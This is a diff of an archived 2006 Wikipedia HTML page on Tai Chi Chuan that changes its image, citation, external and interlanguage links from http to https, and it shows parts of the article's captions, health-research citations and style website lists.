<div id="siteNotice"><div id="wikimania2006" style="text-align:right; font-size:80%"><a href="http://wm06reg.wikimedia.org/" class="external text" title="http://wm06reg.wikimedia.org/">Registration</a> for <a href="http://wikimania2006.wikimedia.org" class="external text" title="http://wikimania2006.wikimedia.org">Wikimania 2006</a> is open.&nbsp;&nbsp;&nbsp;</div>
<div id="siteNotice"><div id="wikimania2006" style="text-align:right; font-size:80%"><a href="https://wm06reg.wikimedia.org/" class="external text" title="https://wm06reg.wikimedia.org/">Registration</a> for <a href="https://wikimania2006.wikimedia.org" class="external text" title="https://wikimania2006.wikimedia.org">Wikimania 2006</a> is open.&nbsp;&nbsp;&nbsp;</div>
</div> <h1 class="firstHeading">Tai Chi Chuan</h1>
<div id="bodyContent">
<h3 id="siteSub">From Wikipedia, the free encyclopedia</h3>
@@ -50,7 +50,7 @@
<div class="center">
<div class="thumb tnone">
<div style="width:182px;"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918"><img src="http://upload.wikimedia.org/wikipedia/en/thumb/d/d1/Yang_Ch%27eng-fu_circa_1918.jpg/180px-Yang_Ch%27eng-fu_circa_1918.jpg" alt="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918" width="180" height="255" longdesc="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" /></a>
<div style="width:182px;"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918"><img src="https://upload.wikimedia.org/wikipedia/en/thumb/d/d1/Yang_Ch%27eng-fu_circa_1918.jpg/180px-Yang_Ch%27eng-fu_circa_1918.jpg" alt="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918" width="180" height="255" longdesc="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" /></a>
<div class="thumbcaption">
<div class="magnify" style="float:right"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div>
<b><a href="/wiki/Yang_Chengfu" title="Yang Chengfu">Yang Chengfu</a> in a posture from the Tai Chi solo form known as <i>Single Whip</i>, circa <a href="/wiki/1918" title="1918">1918</a></b></div>
@@ -78,7 +78,7 @@
</tr>
<tr>
<td><a href="/wiki/Traditional_Chinese" title="Traditional Chinese">Traditional Chinese</a></td>
<td><a href="http://en.wiktionary.org/wiki/%E5%A4%AA" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%A5%B5" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%8B%B3" class="extiw" title="wiktionary:?">?</a></td>
<td><a href="https://en.wiktionary.org/wiki/%E5%A4%AA" class="extiw" title="wiktionary:?">?</a><a href="https://en.wiktionary.org/wiki/%E6%A5%B5" class="extiw" title="wiktionary:?">?</a><a href="https://en.wiktionary.org/wiki/%E6%8B%B3" class="extiw" title="wiktionary:?">?</a></td>
</tr>
<tr>
<td><a href="/wiki/Cantonese_%28linguistics%29" title="Cantonese (linguistics)">Cantonese</a></td>
@@ -170,7 +170,7 @@
<h2>Training and techniques</h2>
<div class="thumb tright">
<div style="width:182px;"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Yin_yang.svg/180px-Yin_yang.svg.png" alt="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)" width="180" height="180" longdesc="/wiki/Image:Yin_yang.svg" /></a>
<div style="width:182px;"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Yin_yang.svg/180px-Yin_yang.svg.png" alt="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)" width="180" height="180" longdesc="/wiki/Image:Yin_yang.svg" /></a>
<div class="thumbcaption">
<div class="magnify" style="float:right"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div>
<b>The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)</b></div>
@@ -199,7 +199,7 @@
<dd>Avoid than intimidate."</dd>
</dl>
<div class="thumb tright">
<div style="width:352px;"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="An outdoor Chen style class in Beijing"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Martial_arts_-_Fragrant_Hills.JPG/350px-Martial_arts_-_Fragrant_Hills.JPG" alt="An outdoor Chen style class in Beijing" width="350" height="233" longdesc="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" /></a>
<div style="width:352px;"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="An outdoor Chen style class in Beijing"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Martial_arts_-_Fragrant_Hills.JPG/350px-Martial_arts_-_Fragrant_Hills.JPG" alt="An outdoor Chen style class in Beijing" width="350" height="233" longdesc="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" /></a>
<div class="thumbcaption">
<div class="magnify" style="float:right"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div>
An outdoor Chen style class in Beijing</div>
@@ -313,7 +313,7 @@ from Yang Ch`eng-fu
<p><a name="Modern_T.27ai_Chi" id="Modern_T.27ai_Chi"></a></p>
<h2>Modern T'ai Chi</h2>
<div class="thumb tright">
<div style="width:352px;"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Yang style in Shanghai"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Taichi_shanghai_bund_2005.jpg/350px-Taichi_shanghai_bund_2005.jpg" alt="Yang style in Shanghai" width="350" height="263" longdesc="/wiki/Image:Taichi_shanghai_bund_2005.jpg" /></a>
<div style="width:352px;"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Yang style in Shanghai"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Taichi_shanghai_bund_2005.jpg/350px-Taichi_shanghai_bund_2005.jpg" alt="Yang style in Shanghai" width="350" height="263" longdesc="/wiki/Image:Taichi_shanghai_bund_2005.jpg" /></a>
<div class="thumbcaption">
<div class="magnify" style="float:right"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div>
Yang style in Shanghai</div>
@@ -327,7 +327,7 @@ Yang style in Shanghai</div>
<h3>Modern forms</h3>
<div class="thumb tright">
<div style="width:352px;"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)."><img src="http://upload.wikimedia.org/wikipedia/en/thumb/a/ad/Tai_Chi_fans.jpg/350px-Tai_Chi_fans.jpg" alt="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)." width="350" height="201" longdesc="/wiki/Image:Tai_Chi_fans.jpg" /></a>
<div style="width:352px;"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)."><img src="https://upload.wikimedia.org/wikipedia/en/thumb/a/ad/Tai_Chi_fans.jpg/350px-Tai_Chi_fans.jpg" alt="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)." width="350" height="201" longdesc="/wiki/Image:Tai_Chi_fans.jpg" /></a>
<div class="thumbcaption">
<div class="magnify" style="float:right"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div>
Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%29" title="Chinatown (Manhattan)">Chinatown</a> (<a href="/wiki/New_York_City" title="New York City">New York City</a>, <a href="/wiki/New_York" title="New York">New York</a>, <a href="/wiki/USA" title="USA">USA</a>).</div>
@@ -345,24 +345,24 @@ Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%2
<p>Researchers have found that long-term T'ai Chi practice had favorable effects on the promotion of balance control, flexibility and cardiovascular fitness and reduced the risk of falls in elders. The studies also reported reduced pain, stress and anxiety in healthy subjects. Other studies have indicated improved cardiovascular and respiratory function in healthy subjects as well as those who had undergone coronary artery bypass surgery. Patients also benefited from T'ai Chi who suffered from heart failure, high blood pressure, heart attacks, arthritis and multiple sclerosis.</p>
<p>T'ai Chi has also been shown to reduce the symptoms of young Attention Deficit and Hyperactivity Disorder (<a href="/wiki/ADHD" title="ADHD">ADHD</a>) sufferers. T'ai Chi's gentle, low impact, movements surprisingly burn more calories than surfing and nearly as many as downhill skiing. T'ai Chi also boosts aspects of the immune system's function very significantly, and has been shown to reduce the incidence of anxiety, depression, and overall mood disturbance. (See research citations listed below.)</p>
<p>A pilot study has found evidence that T'ai Chi and related qigong helps reduce the severity of <a href="/wiki/Diabetes" title="Diabetes">diabetes</a>.<a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external autonumber" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">[1]</a></p>
<p>A pilot study has found evidence that T'ai Chi and related qigong helps reduce the severity of <a href="/wiki/Diabetes" title="Diabetes">diabetes</a>.<a href="https://www.abc.net.au/pm/content/2005/s1535304.htm" class="external autonumber" title="https://www.abc.net.au/pm/content/2005/s1535304.htm">[1]</a></p>
<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&amp;action=edit&amp;section=9" title="Edit section: Citations to medical research">edit</a>]</div>
<p><a name="Citations_to_medical_research" id="Citations_to_medical_research"></a></p>
<h3>Citations to medical research</h3>
<ul>
<li>Wolf SL, Sattin RW, Kutner M. Intense T'ai Chi exercise training and fall occurrences in older, transitionally frail adults: a randomized, controlled trial. J Am Geriatr Soc. 2003 Dec; 51(12): 1693-701. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=14687346" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=14687346">PMID 14687346</a></li>
<li>Wang C, Collet JP, Lau J. The effect of Tai Chi on health outcomes in patients with chronic conditions: a <a href="/wiki/Systematic_review" title="Systematic review">systematic review</a>. Arch Intern Med. 2004 Mar 8;164(5):493-501. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=15006825" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=15006825">PMID 15006825</a></li>
<li>Wolf SL, Sattin RW, Kutner M. Intense T'ai Chi exercise training and fall occurrences in older, transitionally frail adults: a randomized, controlled trial. J Am Geriatr Soc. 2003 Dec; 51(12): 1693-701. <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=14687346" class="external" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=14687346">PMID 14687346</a></li>
<li>Wang C, Collet JP, Lau J. The effect of Tai Chi on health outcomes in patients with chronic conditions: a <a href="/wiki/Systematic_review" title="Systematic review">systematic review</a>. Arch Intern Med. 2004 Mar 8;164(5):493-501. <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=15006825" class="external" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&amp;db=pubmed&amp;dopt=Abstract&amp;list_uids=15006825">PMID 15006825</a></li>
<li>Search a listing of articles relating to the FICSIT trials and T'ai Chi <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&amp;db=pubmed&amp;query_key=3" class="external autonumber" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&amp;db=pubmed&amp;query_key=3">[2]</a></li>
<li>Search a listing of articles relating to the FICSIT trials and T'ai Chi <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&amp;db=pubmed&amp;query_key=3" class="external autonumber" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&amp;db=pubmed&amp;query_key=3">[2]</a></li>
<li>Hernandez-Reif, M., Field, T.M., &amp; Thimas, E. (2001). Attention deficit hyperactivity disorder: benefits from Tai Chi. Journal of Bodywork &amp; Movement Therapies, 5(2):120-3, 2001 Apr, 5(23 ref), 120-123</li>
<li>Calorie Burning Chart <a href="http://www.nutristrategy.com/activitylist3.htm" class="external autonumber" title="http://www.nutristrategy.com/activitylist3.htm">[3]</a></li>
<li>Tai Chi boosts T-Cell counts in immune system <a href="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html" class="external autonumber" title="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html">[4]</a></li>
<li>Calorie Burning Chart <a href="https://www.nutristrategy.com/activitylist3.htm" class="external autonumber" title="https://www.nutristrategy.com/activitylist3.htm">[3]</a></li>
<li>Tai Chi boosts T-Cell counts in immune system <a href="https://www.acupuncturetoday.com/archives2003/nov/11taichi.html" class="external autonumber" title="https://www.acupuncturetoday.com/archives2003/nov/11taichi.html">[4]</a></li>
<li>Tai Chi, depression, anxiety, and mood disturbance (American Psychological Association) Journal of Psychosomatic Research, 1989 Vol 33 (2) 197-206</li>
<li>A comprehensive listing of Tai Chi medical research links <a href="http://www.worldtaichiday.org/WTCQDHlthBenft.html" class="external autonumber" title="http://www.worldtaichiday.org/WTCQDHlthBenft.html">[5]</a></li>
<li>References to medical publications <a href="http://www.worldtaichiday.org/HeadlineNews.html" class="external autonumber" title="http://www.worldtaichiday.org/HeadlineNews.html">[6]</a></li>
<li><a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external text" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">Tai Chi a promising remedy for diabetes</a>, <i>Australian Broadcasting Corporation</i>, 20 December, 2005 - Pilot study of Qigong and tai chi in diabetes sufferers.</li>
<li>Health Research Articles on "Tai Chi as Health Therapy" for many issues, i.e. ADHD, Cardiac Health &amp; Rehabilitation, Diabetes, High Blood Pressure, Menopause, Bone Loss, Weight Loss, etc.<a href="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html" class="external autonumber" title="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html">[7]</a></li>
<li>A comprehensive listing of Tai Chi medical research links <a href="https://www.worldtaichiday.org/WTCQDHlthBenft.html" class="external autonumber" title="https://www.worldtaichiday.org/WTCQDHlthBenft.html">[5]</a></li>
<li>References to medical publications <a href="https://www.worldtaichiday.org/HeadlineNews.html" class="external autonumber" title="https://www.worldtaichiday.org/HeadlineNews.html">[6]</a></li>
<li><a href="https://www.abc.net.au/pm/content/2005/s1535304.htm" class="external text" title="https://www.abc.net.au/pm/content/2005/s1535304.htm">Tai Chi a promising remedy for diabetes</a>, <i>Australian Broadcasting Corporation</i>, 20 December, 2005 - Pilot study of Qigong and tai chi in diabetes sufferers.</li>
<li>Health Research Articles on "Tai Chi as Health Therapy" for many issues, i.e. ADHD, Cardiac Health &amp; Rehabilitation, Diabetes, High Blood Pressure, Menopause, Bone Loss, Weight Loss, etc.<a href="https://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html" class="external autonumber" title="https://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html">[7]</a></li>
</ul>
<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&amp;action=edit&amp;section=10" title="Edit section: See also">edit</a>]</div>
@@ -380,25 +380,25 @@ Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%2
<p><a name="External_links" id="External_links"></a></p>
<h2>External links</h2>
<ul>
<li><a href="http://www.chenxiaowang.com/" class="external text" title="http://www.chenxiaowang.com/">A Chen Family Website</a></li>
<li><a href="http://www.yangfamilytaichi.com/" class="external text" title="http://www.yangfamilytaichi.com/">Yang Family Website</a></li>
<li><a href="http://www.wustyle.com/" class="external text" title="http://www.wustyle.com/">Wu Chien-ch'<27>an Family Website</a></li>
<li><a href="http://www.fushengyuan-taichi.com.au/" class="external text" title="http://www.fushengyuan-taichi.com.au/">Fu Family Website</a></li>
<li><a href="https://www.chenxiaowang.com/" class="external text" title="https://www.chenxiaowang.com/">A Chen Family Website</a></li>
<li><a href="https://www.yangfamilytaichi.com/" class="external text" title="https://www.yangfamilytaichi.com/">Yang Family Website</a></li>
<li><a href="https://www.wustyle.com/" class="external text" title="https://www.wustyle.com/">Wu Chien-ch'<27>an Family Website</a></li>
<li><a href="https://www.fushengyuan-taichi.com.au/" class="external text" title="https://www.fushengyuan-taichi.com.au/">Fu Family Website</a></li>
<li><a href="http://www.itcca.org/" class="external text" title="http://www.itcca.org/">Yang family disciple's website (ITCCA)</a></li>
<li><a href="http://www.dongtaichi.com/" class="external text" title="http://www.dongtaichi.com/">Dong T'ai Chi</a></li>
<li><a href="http://www.leefamilystyle.com/" class="external text" title="http://www.leefamilystyle.com/">UK website for Li style, popular in Europe</a></li>
<li><a href="http://www.chen-taiji.com/mambo/" class="external text" title="http://www.chen-taiji.com/mambo/">The World of Taijiquan</a></li>
<li><a href="http://www.scheele.org/lee/tcclinks.html" class="external text" title="http://www.scheele.org/lee/tcclinks.html">Lee Scheele's Links to T'ai Chi Ch'uan Web Sites</a></li>
<li><a href="http://news.bbc.co.uk/1/hi/health/3543907.stm" class="external text" title="http://news.bbc.co.uk/1/hi/health/3543907.stm">BBC article</a></li>
<li><a href="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html" class="external text" title="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html">Tai Chi: Good for the Mind, Good for the Body</a></li>
<li><a href="http://www.taichiunion.com/" class="external text" title="http://www.taichiunion.com/">Tai Chi Chuan Union for Great Britian: The largest collective of independent Tai Chi Chuan Instructors in the British Isles</a></li>
<li><a href="https://www.itcca.org/" class="external text" title="https://www.itcca.org/">Yang family disciple's website (ITCCA)</a></li>
<li><a href="https://www.dongtaichi.com/" class="external text" title="https://www.dongtaichi.com/">Dong T'ai Chi</a></li>
<li><a href="https://www.leefamilystyle.com/" class="external text" title="https://www.leefamilystyle.com/">UK website for Li style, popular in Europe</a></li>
<li><a href="https://www.chen-taiji.com/mambo/" class="external text" title="https://www.chen-taiji.com/mambo/">The World of Taijiquan</a></li>
<li><a href="https://www.scheele.org/lee/tcclinks.html" class="external text" title="https://www.scheele.org/lee/tcclinks.html">Lee Scheele's Links to T'ai Chi Ch'uan Web Sites</a></li>
<li><a href="https://news.bbc.co.uk/1/hi/health/3543907.stm" class="external text" title="https://news.bbc.co.uk/1/hi/health/3543907.stm">BBC article</a></li>
<li><a href="https://www.acupuncturetoday.com/archives2004/jul/07taichi.html" class="external text" title="https://www.acupuncturetoday.com/archives2004/jul/07taichi.html">Tai Chi: Good for the Mind, Good for the Body</a></li>
<li><a href="https://www.taichiunion.com/" class="external text" title="https://www.taichiunion.com/">Tai Chi Chuan Union for Great Britian: The largest collective of independent Tai Chi Chuan Instructors in the British Isles</a></li>
</ul>
<!-- Saved in parser cache with key enwiki:pcache:idhash:30690-0!0!0!1!!en!2 and timestamp 20060722121412 -->
<div class="printfooter">
Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.wikipedia.org/wiki/Tai_Chi_Chuan</a>"</div>
Retrieved from "<a href="https://en.wikipedia.org/wiki/Tai_Chi_Chuan">https://en.wikipedia.org/wiki/Tai_Chi_Chuan</a>"</div>
<div id="catlinks"><p class='catlinks'><a href="/w/index.php?title=Special:Categories&amp;article=Tai_Chi_Chuan" title="Special:Categories">Categories</a>: <span dir='ltr'><a href="/wiki/Category:Chinese_martial_arts" title="Category:Chinese martial arts">Chinese martial arts</a></span> | <span dir='ltr'><a href="/wiki/Category:T%27ai_Chi_Ch%27uan" title="Category:T'ai Chi Ch'uan">T'ai Chi Ch'uan</a></span> | <span dir='ltr'><a href="/wiki/Category:Taoism" title="Category:Taoism">Taoism</a></span> | <span dir='ltr'><a href="/wiki/Category:Meditation" title="Category:Meditation">Meditation</a></span> | <span dir='ltr'><a href="/wiki/Category:Mind-body_interventions" title="Category:Mind-body interventions">Mind-body interventions</a></span> | <span dir='ltr'><a href="/wiki/Category:Traditional_Chinese_medicine" title="Category:Traditional Chinese medicine">Traditional Chinese medicine</a></span></p></div> <!-- end content -->
<div class="visualClear"></div>
@@ -454,7 +454,7 @@ Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.w
<li id="n-randompage"><a href="/wiki/Special:Random">Random article</a></li>
<li id="n-help"><a href="/wiki/Help:Contents">Help</a></li>
<li id="n-contact"><a href="/wiki/Wikipedia:Contact_us">Contact Wikipedia</a></li>
<li id="n-sitesupport"><a href="http://wikimediafoundation.org/wiki/Fundraising#Donation_methods">Donations</a></li>
<li id="n-sitesupport"><a href="https://wikimediafoundation.org/wiki/Fundraising#Donation_methods">Donations</a></li>
</ul>
</div>
@@ -487,34 +487,34 @@ Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.w
<h5>In other languages</h5>
<div class="pBody">
<ul>
<li class="interwiki-br"><a href="http://br.wikipedia.org/wiki/Taichichuan">Brezhoneg</a></li>
<li class="interwiki-ca"><a href="http://ca.wikipedia.org/wiki/Tai_txi_txuan">Catal<EFBFBD></a></li>
<li class="interwiki-br"><a href="https://br.wikipedia.org/wiki/Taichichuan">Brezhoneg</a></li>
<li class="interwiki-ca"><a href="https://ca.wikipedia.org/wiki/Tai_txi_txuan">Catal<EFBFBD></a></li>
<li class="interwiki-cs"><a href="http://cs.wikipedia.org/wiki/Tchaj-%C5%A5i">Cesky</a></li>
<li class="interwiki-da"><a href="http://da.wikipedia.org/wiki/Tai_Chi">Dansk</a></li>
<li class="interwiki-de"><a href="http://de.wikipedia.org/wiki/Taijiquan">Deutsch</a></li>
<li class="interwiki-et"><a href="http://et.wikipedia.org/wiki/Taijiquan">Eesti</a></li>
<li class="interwiki-el"><a href="http://el.wikipedia.org/wiki/%CE%A4%CE%AC%CE%B9_%CE%A4%CE%B6%CE%AF_%CE%A3%CE%BF%CF%85%CE%AC%CE%BD">????????</a></li>
<li class="interwiki-es"><a href="http://es.wikipedia.org/wiki/Tai_Chi_Chuan">Espa<EFBFBD>ol</a></li>
<li class="interwiki-cs"><a href="https://cs.wikipedia.org/wiki/Tchaj-%C5%A5i">Cesky</a></li>
<li class="interwiki-da"><a href="https://da.wikipedia.org/wiki/Tai_Chi">Dansk</a></li>
<li class="interwiki-de"><a href="https://de.wikipedia.org/wiki/Taijiquan">Deutsch</a></li>
<li class="interwiki-et"><a href="https://et.wikipedia.org/wiki/Taijiquan">Eesti</a></li>
<li class="interwiki-el"><a href="https://el.wikipedia.org/wiki/%CE%A4%CE%AC%CE%B9_%CE%A4%CE%B6%CE%AF_%CE%A3%CE%BF%CF%85%CE%AC%CE%BD">????????</a></li>
<li class="interwiki-es"><a href="https://es.wikipedia.org/wiki/Tai_Chi_Chuan">Espa<EFBFBD>ol</a></li>
<li class="interwiki-eo"><a href="http://eo.wikipedia.org/wiki/Taj%C4%9Di%C4%89uano">Esperanto</a></li>
<li class="interwiki-fr"><a href="http://fr.wikipedia.org/wiki/Tai-chi-chuan">Fran<EFBFBD>ais</a></li>
<li class="interwiki-it"><a href="http://it.wikipedia.org/wiki/Taijiquan">Italiano</a></li>
<li class="interwiki-he"><a href="http://he.wikipedia.org/wiki/%D7%98%D7%90%D7%99_%D7%A6%27%D7%99">?????</a></li>
<li class="interwiki-hu"><a href="http://hu.wikipedia.org/wiki/Taijiquan">Magyar</a></li>
<li class="interwiki-nl"><a href="http://nl.wikipedia.org/wiki/Tai_Chi">Nederlands</a></li>
<li class="interwiki-eo"><a href="https://eo.wikipedia.org/wiki/Taj%C4%9Di%C4%89uano">Esperanto</a></li>
<li class="interwiki-fr"><a href="https://fr.wikipedia.org/wiki/Tai-chi-chuan">Fran<EFBFBD>ais</a></li>
<li class="interwiki-it"><a href="https://it.wikipedia.org/wiki/Taijiquan">Italiano</a></li>
<li class="interwiki-he"><a href="https://he.wikipedia.org/wiki/%D7%98%D7%90%D7%99_%D7%A6%27%D7%99">?????</a></li>
<li class="interwiki-hu"><a href="https://hu.wikipedia.org/wiki/Taijiquan">Magyar</a></li>
<li class="interwiki-nl"><a href="https://nl.wikipedia.org/wiki/Tai_Chi">Nederlands</a></li>
<li class="interwiki-ja"><a href="http://ja.wikipedia.org/wiki/%E5%A4%AA%E6%A5%B5%E6%8B%B3">???</a></li>
<li class="interwiki-pl"><a href="http://pl.wikipedia.org/wiki/Taijiquan">Polski</a></li>
<li class="interwiki-pt"><a href="http://pt.wikipedia.org/wiki/Tai_Chi_Chuan">Portugu<EFBFBD>s</a></li>
<li class="interwiki-ro"><a href="http://ro.wikipedia.org/wiki/Taijiquan">Rom<EFBFBD>na</a></li>
<li class="interwiki-ru"><a href="http://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%B9%D1%86%D0%B7%D0%B8%D1%86%D1%8E%D0%B0%D0%BD%D1%8C">???????</a></li>
<li class="interwiki-fi"><a href="http://fi.wikipedia.org/wiki/Taijiquan">Suomi</a></li>
<li class="interwiki-ja"><a href="https://ja.wikipedia.org/wiki/%E5%A4%AA%E6%A5%B5%E6%8B%B3">???</a></li>
<li class="interwiki-pl"><a href="https://pl.wikipedia.org/wiki/Taijiquan">Polski</a></li>
<li class="interwiki-pt"><a href="https://pt.wikipedia.org/wiki/Tai_Chi_Chuan">Portugu<EFBFBD>s</a></li>
<li class="interwiki-ro"><a href="https://ro.wikipedia.org/wiki/Taijiquan">Rom<EFBFBD>na</a></li>
<li class="interwiki-ru"><a href="https://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%B9%D1%86%D0%B7%D0%B8%D1%86%D1%8E%D0%B0%D0%BD%D1%8C">???????</a></li>
<li class="interwiki-fi"><a href="https://fi.wikipedia.org/wiki/Taijiquan">Suomi</a></li>
<li class="interwiki-sv"><a href="http://sv.wikipedia.org/wiki/Taijiquan">Svenska</a></li>
<li class="interwiki-th"><a href="http://th.wikipedia.org/wiki/%E0%B9%84%E0%B8%97%E0%B9%88%E0%B9%80%E0%B8%81%E0%B9%8A%E0%B8%81">???</a></li>
<li class="interwiki-tr"><a href="http://tr.wikipedia.org/wiki/Tai-Chi_Chuan">T<EFBFBD>rk<EFBFBD>e</a></li>
<li class="interwiki-zh"><a href="http://zh.wikipedia.org/wiki/%E5%A4%AA%E6%9E%81%E6%8B%B3">??</a></li>
<li class="interwiki-sv"><a href="https://sv.wikipedia.org/wiki/Taijiquan">Svenska</a></li>
<li class="interwiki-th"><a href="https://th.wikipedia.org/wiki/%E0%B9%84%E0%B8%97%E0%B9%88%E0%B9%80%E0%B8%81%E0%B9%8A%E0%B8%81">???</a></li>
<li class="interwiki-tr"><a href="https://tr.wikipedia.org/wiki/Tai-Chi_Chuan">T<EFBFBD>rk<EFBFBD>e</a></li>
<li class="interwiki-zh"><a href="https://zh.wikipedia.org/wiki/%E5%A4%AA%E6%9E%81%E6%8B%B3">??</a></li>
</ul>
</div>
</div>
@@ -522,13 +522,13 @@ Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.w
</div><!-- end of the left (by default at least) column -->
<div class="visualClear"></div>
<div id="footer">
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins-1.5/common/images/poweredby_mediawiki_88x31.png" alt="MediaWiki" /></a></div>
<div id="f-copyrightico"><a href="http://wikimediafoundation.org/"><img src="/images/wikimedia-button.png" border="0" alt="Wikimedia Foundation"/></a></div>
<div id="f-poweredbyico"><a href="https://www.mediawiki.org/"><img src="/skins-1.5/common/images/poweredby_mediawiki_88x31.png" alt="MediaWiki" /></a></div>
<div id="f-copyrightico"><a href="https://wikimediafoundation.org/"><img src="/images/wikimedia-button.png" border="0" alt="Wikimedia Foundation"/></a></div>
<ul id="f-list">
<li id="lastmod"> This page was last modified 03:15, July 22, 2006.</li>
<li id="copyright">All text is available under the terms of the <a class='internal' href="/wiki/Wikipedia:Text_of_the_GNU_Free_Documentation_License" title="Wikipedia:Text of the GNU Free Documentation License">GNU Free Documentation License</a>. (See <b><a class='internal' href="/wiki/Wikipedia:Copyrights" title="Wikipedia:Copyrights">Copyrights</a></b> for details.) <br /> Wikipedia&reg; is a registered trademark of the Wikimedia Foundation, Inc.<br /></li>
<li id="privacy"><a href="http://wikimediafoundation.org/wiki/Privacy_policy" title="wikimedia:Privacy policy">Privacy policy</a></li>
<li id="privacy"><a href="https://wikimediafoundation.org/wiki/Privacy_policy" title="wikimedia:Privacy policy">Privacy policy</a></li>
